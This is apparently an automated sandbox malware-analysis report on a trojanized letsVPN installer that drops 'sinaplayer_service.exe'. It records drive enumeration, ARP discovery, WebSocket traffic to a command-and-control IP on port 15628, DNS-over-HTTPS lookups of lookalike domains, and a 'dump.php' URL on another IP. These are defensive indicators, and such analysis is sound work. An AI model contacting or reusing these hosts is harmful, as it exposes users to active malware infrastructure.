              Source: Binary string: c:\users\samuli\opt\tap-windows6-mattock\tapinstall\7600\objfre_wlh_amd64\amd64\tapinstall.pdbH source: letsvpn-latest.exe, 00000013.00000003.2322499057.000000000536F000.00000004.00000020.00020000.00000000.sdmp, tapinstall.exe, 0000001C.00000002.2683090826.00007FF7132A1000.00000020.00000001.01000000.00000016.sdmp, tapinstall.exe, 0000001C.00000000.2681003659.00007FF7132A1000.00000020.00000001.01000000.00000016.sdmp, tapinstall.exe, 0000001E.00000000.2683431431.00007FF7132A1000.00000020.00000001.01000000.00000016.sdmp, tapinstall.exe, 0000001E.00000002.2728411628.00007FF7132A1000.00000020.00000001.01000000.00000016.sdmp, tapinstall.exe, 00000024.00000002.2736525094.00007FF7132A1000.00000020.00000001.01000000.00000016.sdmp, tapinstall.exe, 00000024.00000000.2729197986.00007FF7132A1000.00000020.00000001.01000000.00000016.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.IO.Compression/netfx\System.IO.Compression.pdb]W source: letsvpn-latest.exe, 00000013.00000003.2420064156.0000000002831000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/Microsoft.Win32.SystemEvents/net461-Release/Microsoft.Win32.SystemEvents.pdb source: letsvpn-latest.exe, 00000013.00000003.2363516673.0000000002837000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.Requests\4.0.11.0\System.Net.Requests.pdb source: letsvpn-latest.exe, 00000013.00000003.2444933089.0000000002838000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.Extensions\4.1.2.0\System.Runtime.Extensions.pdb source: letsvpn-latest.exe, 00000013.00000003.2455636991.000000000536F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.Net.Sockets/netfx\System.Net.Sockets.pdb source: letsvpn-latest.exe, 00000013.00000003.2446092448.000000000283E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Collections\4.0.11.0\System.Collections.pdb source: letsvpn-latest.exe, 00000013.00000003.2392116822.0000000002830000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.WebSockets\4.0.2.0\System.Net.WebSockets.pdb source: letsvpn-latest.exe, 00000013.00000003.2447928551.0000000002836000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/Microsoft.Toolkit.Uwp.Notifications/obj/Release/net461/Microsoft.Toolkit.Uwp.Notifications.pdbSHA256 source: letsvpn-latest.exe, 00000013.00000003.2355870263.0000000002839000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/AnyOS.AnyCPU.Release/System.Diagnostics.StackTrace/netfx\System.Diagnostics.StackTrace.pdb$.>. 0._CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000013.00000003.2411809176.0000000002839000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.Serialization.Json\4.0.1.0\System.Runtime.Serialization.Json.pdb source: letsvpn-latest.exe, 00000013.00000003.2461351463.000000000283C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.MemoryMappedFiles\4.0.2.0\System.IO.MemoryMappedFiles.pdb source: letsvpn-latest.exe, 00000013.00000003.2424521311.0000000002830000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Globalization.Calendars\4.0.3.0\System.Globalization.Calendars.pdb source: letsvpn-latest.exe, 00000013.00000003.2417185734.0000000002838000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.ServiceModel.Security.Facade/Release/net461/System.ServiceModel.Security.pdb source: letsvpn-latest.exe, 00000013.00000003.2479940327.0000000002830000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Diagnostics.EventLog/net461-Release/System.Diagnostics.EventLog.pdb source: letsvpn-latest.exe, 00000013.00000003.2408789957.0000000002834000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\s\SDK\AppCenter\Microsoft.AppCenter.WindowsDesktop\obj\Release\net461\Microsoft.AppCenter.pdbSHA256X7 source: letsvpn-latest.exe, 00000013.00000003.2352489250.0000000002830000.00000004.00000020.00020000.00000000.sdmp

              Spreading

              Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ARP.EXE arp -a
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exe File opened: z:
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exe File opened: x:
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exe File opened: v:
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exe File opened: t:
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exe File opened: r:
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exe File opened: p:
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exe File opened: n:
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exe File opened: l:
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exe File opened: j:
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exe File opened: h:
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exe File opened: f:
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exe File opened: b:
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exe File opened: y:
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exe File opened: w:
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exe File opened: u:
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exe File opened: s:
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exe File opened: q:
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exe File opened: o:
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exe File opened: m:
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exe File opened: k:
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exe File opened: i:
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exe File opened: g:
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exe File opened: e:
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe File opened: c:
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exe File opened: [:
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_6C5CEB97 _wstat64,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,wcslen,GetDriveTypeW,free,free,_wsopen_s,__fstat64,_close,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FindClose,GetLastError,__dosmaperr,FindClose,GetLastError,__dosmaperr,FindClose,17_2_6C5CEB97
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_6C5CC41C _mbsdec,_mbscmp,_mbscmp,_strdup,strlen,_calloc_crt,__cftof,strcpy_s,_mbsicmp,_invoke_watson,_malloc_crt,FindClose,FindFirstFileExW,FindNextFileW,FindClose,17_2_6C5CC41C
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_6C5CE748 _wstat32,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,wcslen,GetDriveTypeW,free,___loctotime32_t,free,_wsopen_s,__fstat32,_close,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,___loctotime32_t,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,___loctotime32_t,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,___loctotime32_t,FindClose,_errno,GetLastError,__dosmaperr,FindClose,GetLastError,__dosmaperr,FindClose,17_2_6C5CE748
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_6C5CC385 _malloc_crt,FindClose,FindFirstFileExA,FindNextFileA,FindClose,17_2_6C5CC385
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_6C5CDCF7 _wfindfirst64i32,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,_invoke_watson,17_2_6C5CDCF7
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_6C565C91 _wstat64i32,_wcspbrk,towlower,FindFirstFileExW,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FindClose,_getdrive,GetLastError,GetLastError,_wcspbrk,wcslen,_errno,__doserrno,__doserrno,_errno,_invalid_parameter_noinfo,GetDriveTypeW,free,free,_wsopen_s,__fstat64i32,_close,_errno,__dosmaperr,FindClose,__dosmaperr,FindClose,17_2_6C565C91
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_6C5CDF35 _wfindfirst32i64,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,_invoke_watson,17_2_6C5CDF35
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_6C5CD86F _wfindfirst32,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,_invoke_watson,17_2_6C5CD86F
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_6C5CDA9B _wfindfirst64,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,_invoke_watson,17_2_6C5CDA9B
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_6C5CF00C _wstat32i64,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,wcslen,GetDriveTypeW,free,___loctotime32_t,free,_wsopen_s,__fstat32i64,_close,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,___loctotime32_t,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,___loctotime32_t,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,___loctotime32_t,FindClose,GetLastError,__dosmaperr,FindClose,GetLastError,__dosmaperr,FindClose,17_2_6C5CF00C
              Source: C:\ProgramData\letsvpn-latest.exeCode function: 19_2_00405C4D GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,19_2_00405C4D
              Source: C:\ProgramData\letsvpn-latest.exeCode function: 19_2_0040689E FindFirstFileW,FindClose,19_2_0040689E
              Source: C:\ProgramData\letsvpn-latest.exeCode function: 19_2_00402930 FindFirstFileW,19_2_00402930
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeCode function: 28_2_00007FF7132A10D0 GetCurrentProcess,GetProcAddress,FindFirstFileW,28_2_00007FF7132A10D0
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeCode function: 28_2_00007FF7132A1110 FindFirstFileW,28_2_00007FF7132A1110
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeCode function: 28_2_00007FF7132A71EC GetWindowsDirectoryW,FindFirstFileW,__iob_func,__iob_func,__iob_func,FindNextFileW,FindClose,28_2_00007FF7132A71EC
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeCode function: 53_2_00854318 __EH_prolog3_GS,FindFirstFileW,FindNextFileW,FindClose,std::ios_base::_Ios_base_dtor,53_2_00854318
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeCode function: 53_2_00865490 FindFirstFileExW,53_2_00865490
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exe Code function: 4x nop then push esi 17_2_6C5F90B4

              Networking

              Source: global traffic TCP traffic: 8.217.212.245 ports 1,2,15628,5,6,8
              Source: unknown Network traffic detected: HTTP traffic on port 49725 -> 15628
              Source: unknown Network traffic detected: HTTP traffic on port 15628 -> 49725
              Source: Yara match File source: C:\Program Files (x86)\letsvpn\app-3.12.0\netstandard.dll, type: DROPPED
              Source: Yara match File source: C:\Program Files (x86)\letsvpn\Update.exe, type: DROPPED
              Source: global traffic TCP traffic: 192.168.2.5:49725 -> 8.217.212.245:15628
              Source: global traffic TCP traffic: 192.168.2.5:49873 -> 8.8.8.8:53
              Source: global trafficHTTP traffic detected: GET /\ HTTP/1.1Connection: UpgradeSec-WebSocket-Key: EHoDnRGHRnGJKgiBCKlZTSJBaSec-WebSocket-Version: 13Upgrade: websocketSec-WebSocket-Extensions: permessage-deflate; client_max_window_bitsHost: 8.217.212.245:15628
              Source: global trafficHTTP traffic detected: GET /app/4fc436ef36f4026102d7?protocol=5&client=pusher-dotnet-client&version=1.1.2 HTTP/1.1Host: ws-ap1.pusher.comUpgrade: websocketConnection: UpgradeSec-WebSocket-Version: 13Sec-WebSocket-Key: YTViMmFmNmQtNjcxNi00Ng==Origin: ws://ws-ap1.pusher.com
              Source: Joe Sandbox View IP Address: 183.60.146.66
              Source: Joe Sandbox View IP Address: 103.235.46.96
              Source: unknown TCP traffic detected without corresponding DNS query: 8.217.212.245
              Source: unknown TCP traffic detected without corresponding DNS query: 8.223.59.119
              Source: unknown TCP traffic detected without corresponding DNS query: 23.98.101.155
              Source: unknown TCP traffic detected without corresponding DNS query: 183.60.146.66
              Source: unknown TCP traffic detected without corresponding DNS query: 35.227.223.56
              Source: unknown TCP traffic detected without corresponding DNS query: 8.223.56.120
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeCode function: 17_2_00373040 GetCurrentThreadId,OutputDebugStringA,?SysNativeMBToWide@base@@YA?AV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@ABV?$BasicStringPiece@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@1@@Z,??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ,??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z,??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ,GetCurrentThreadId,GetTickCount,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z,??6@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AAV01@PB_W@Z,??6@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AAV01@PB_W@Z,??6@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AAV01@PB_W@Z,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z,OutputDebugStringA,OutputDebugStringA,??3@YAXPAX@Z,??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ,??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UAE@XZ,??1?$basic_ios@_WU?$char_traits@_W@std@@@std@@UAE@XZ,InternetOpenW,??0exception@std@@QAE@ABQBD@Z,_CxxThrowException,??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ,??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z,??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ,GetTickCount,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z,GetCurrentThreadId,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z,??6@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AAV01@PB_W@Z,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@PBX@Z,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z,OutputDebugStringA,??3@YAXPAX@Z,??1?$basic_streambuf@DU?$c
har_traits@D@std@@@std@@UAE@XZ,??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UAE@XZ,??1?$basic_ios@_WU?$char_traits@_W@std@@@std@@UAE@XZ,??0exception@std@@QAE@ABQBD@Z,_CxxThrowException,??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ,??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z,??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ,GetTickCount,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z,GetCurrentThreadId,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z,??6@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AAV01@PB_W@Z,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@PBX@Z,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z,OutputDebugStringA,??3@YAXPAX@Z,HttpOpenRequestW,??0exception@std@@QAE@ABQBD@Z,_CxxThrowException,??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ,??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z,??0?$basic_stre17_2_00373040
              Source: global trafficHTTP traffic detected: GET /rest-api?edns_client_subnet=0.0.0.0%2F0&name=nit.crash1ytics.com.&type=1 HTTP/1.1Host: d1dmgcawtbm6l9.cloudfront.netUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
              Source: global trafficHTTP traffic detected: GET /rest-api?edns_client_subnet=0.0.0.0%2F0&name=nal.fqoqehwib.com.&type=1 HTTP/1.1Host: d1dmgcawtbm6l9.cloudfront.netUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
              Source: global trafficHTTP traffic detected: GET /rest-api?edns_client_subnet=0.0.0.0%2F0&name=chr.alipayassets.com.&type=1 HTTP/1.1Host: d1dmgcawtbm6l9.cloudfront.netUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
              Source: letsvpn-latest.exe, 00000013.00000003.2513670746.000000000292A000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: wrong medium typewww.baidu.com:443www.facebook.com.x-forwarded-proto but memory size connection limit (message too big) because dotdotdot in async preempt equals www.facebook.com (Facebook)
              Source: global traffic; DNS traffic detected: DNS query: ws-ap1.pusher.com
              Source: global traffic; DNS traffic detected: DNS query: in.appcenter.ms
              Source: global traffic; DNS traffic detected: DNS query: www.baidu.com
              Source: global traffic; DNS traffic detected: DNS query: www.yandex.com
              Source: global traffic; DNS traffic detected: DNS query: www.google.com
              Source: global traffic; DNS traffic detected: DNS query: nal.fqoqehwib.com
              Source: global traffic; DNS traffic detected: DNS query: d1dmgcawtbm6l9.cloudfront.net
              Source: global traffic; DNS traffic detected: DNS query: chr.alipayassets.com
              Source: global traffic; DNS traffic detected: DNS query: nit.crash1ytics.com
              Source: sinaplayer_service.exe, sinaplayer_service.exe, 00000011.00000000.2194495850.000000000039D000.00000002.00000001.01000000.0000000A.sdmp, sinaplayer_service.exe, 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmp; String found in binary or memory: http://125.211.213.34/dump.php
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
              Source: letsvpn-latest.exe, 00000013.00000003.2516877779.0000000002839000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
              Source: svchost.exe, 0000000C.00000003.2146208720.000001CF4D190000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
              Source: letsvpn-latest.exe, 00000013.00000003.2329176650.000000000283E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fontawesome.iohttp://fontawesome.io/license/
              Source: letsvpn-latest.exe, 00000013.00000003.2329176650.000000000283E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fontawesome.iohttp://fontawesome.io/license/Copyright
              Source: LetsPRO.exe, 00000036.00000002.2774759611.0000000003159000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/Themes/AppMenuDictionary.xaml
              Source: LetsPRO.exe, 00000036.00000002.2774759611.0000000003159000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/Themes/AppMenuDictionary.xamld
              Source: LetsPRO.exe, 00000036.00000002.2774759611.0000000003159000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/Themes/ButtonDictionary.xaml
              Source: LetsPRO.exe, 00000036.00000002.2774759611.0000000003159000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/Themes/ButtonDictionary.xamld
              Source: LetsPRO.exe, 00000036.00000002.2774759611.0000000003159000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/Themes/RadioButtonDictionary.xaml
              Source: LetsPRO.exe, 00000036.00000002.2774759611.0000000003159000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/Themes/RadioButtonDictionary.xamld
              Source: LetsPRO.exe, 00000036.00000002.2774759611.0000000003159000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/Themes/ScrollViewDictionary.xaml
              Source: LetsPRO.exe, 00000036.00000002.2774759611.0000000003159000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/Themes/ScrollViewDictionary.xamld
              Source: LetsPRO.exe, 00000036.00000002.2774759611.0000000003159000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/Themes/TabControllerDictionary.xaml
              Source: LetsPRO.exe, 00000036.00000002.2774759611.0000000003159000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/Themes/TabControllerDictionary.xamld
              Source: LetsPRO.exe, 00000036.00000002.2774759611.0000000003159000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/Themes/TextBoxDictionary.xaml
              Source: LetsPRO.exe, 00000036.00000002.2774759611.0000000003159000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/Themes/TextBoxDictionary.xamld
              Source: LetsPRO.exe, 00000036.00000002.2774759611.0000000003159000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/Themes/WindowDictionary.xaml
              Source: LetsPRO.exe, 00000036.00000002.2774759611.0000000003159000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/Themes/WindowDictionary.xamld
              Source: LetsPRO.exe, 00000036.00000002.2774759611.00000000030D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/app.xaml
              Source: LetsPRO.exe, 00000036.00000002.2774759611.00000000030D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/app.xamld
              Source: LetsPRO.exe, 00000036.00000002.2774759611.00000000030D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/app.baml
              Source: LetsPRO.exe, 00000036.00000002.2774759611.00000000030D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/app.bamld
              Source: LetsPRO.exe, 00000036.00000002.2774759611.00000000030D4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/app.bamlx
              Source: LetsPRO.exe, 00000036.00000002.2774759611.0000000003159000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/themes/appmenudictionary.baml
              Source: LetsPRO.exe, 00000036.00000002.2774759611.0000000003159000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/themes/appmenudictionary.bamld
              Source: LetsPRO.exe, 00000036.00000002.2774759611.0000000003159000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/themes/appmenudictionary.bamlx
              Source: LetsPRO.exe, 00000036.00000002.2774759611.0000000003159000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/themes/buttondictionary.baml
              Source: LetsPRO.exe, 00000036.00000002.2774759611.0000000003159000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/themes/buttondictionary.bamld
              Source: LetsPRO.exe, 00000036.00000002.2774759611.0000000003159000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/themes/radiobuttondictionary.baml
              Source: LetsPRO.exe, 00000036.00000002.2774759611.0000000003159000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/themes/radiobuttondictionary.bamld
              Source: LetsPRO.exe, 00000036.00000002.2774759611.0000000003159000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/themes/scrollviewdictionary.baml
              Source: LetsPRO.exe, 00000036.00000002.2774759611.0000000003159000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/themes/scrollviewdictionary.bamld
              Source: LetsPRO.exe, 00000036.00000002.2774759611.0000000003159000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/themes/tabcontrollerdictionary.baml
              Source: LetsPRO.exe, 00000036.00000002.2774759611.0000000003159000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/themes/tabcontrollerdictionary.bamld
              Source: LetsPRO.exe, 00000036.00000002.2774759611.0000000003159000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/themes/textboxdictionary.baml
              Source: LetsPRO.exe, 00000036.00000002.2774759611.0000000003159000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/themes/textboxdictionary.bamld
              Source: LetsPRO.exe, 00000036.00000002.2774759611.0000000003159000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/themes/windowdictionary.baml
              Source: LetsPRO.exe, 00000036.00000002.2774759611.0000000003159000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/themes/windowdictionary.bamld
              Source: letsVPN.exe, 00000000.00000002.2227641461.0000000140081000.00000002.00000001.01000000.00000003.sdmp, letsVPN.exe, 00000000.00000000.2037454903.0000000140081000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.pacific.net.sg/~jupboo
              Source: letsVPN.exe, 00000000.00000002.2227641461.0000000140081000.00000002.00000001.01000000.00000003.sdmp, letsVPN.exe, 00000000.00000000.2037454903.0000000140081000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://home.pacific.net.sg/~jupboohttp://www.atomixbuttons.comhttp://web.singnet.com.sg/~rendsofthtt
              Source: letsvpn-latest.exe, 00000013.00000003.2330908444.0000000002837000.00000004.00000020.00020000.00000000.sdmp, letsvpn-latest.exe, 00000013.00000003.2350329188.0000000002832000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://icsharpcode.net/sharpdevelop/avalonedit
              Source: letsvpn-latest.exe, 00000013.00000003.2330908444.0000000002837000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://icsharpcode.net/sharpdevelop/avalonedit#ICSharpCode.AvalonEdit.Highlighting
              Source: letsvpn-latest.exe, 00000013.00000003.2330908444.0000000002837000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://icsharpcode.net/sharpdevelop/avalonedit#ICSharpCode.AvalonEdit.HighlightingQ
              Source: letsvpn-latest.exe, 00000013.00000003.2330908444.0000000002837000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://icsharpcode.net/sharpdevelop/syntaxdefinition/2008
              Source: letsvpn-latest.exe, 00000013.00000003.2330908444.0000000002837000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://icsharpcode.net/sharpdevelop/syntaxdefinition/20081Error
              Source: LetsPRO.exe, 00000036.00000002.2777728440.0000000005B62000.00000002.00000001.01000000.0000001D.sdmpString found in binary or memory: http://james.newtonking.com/projects/json
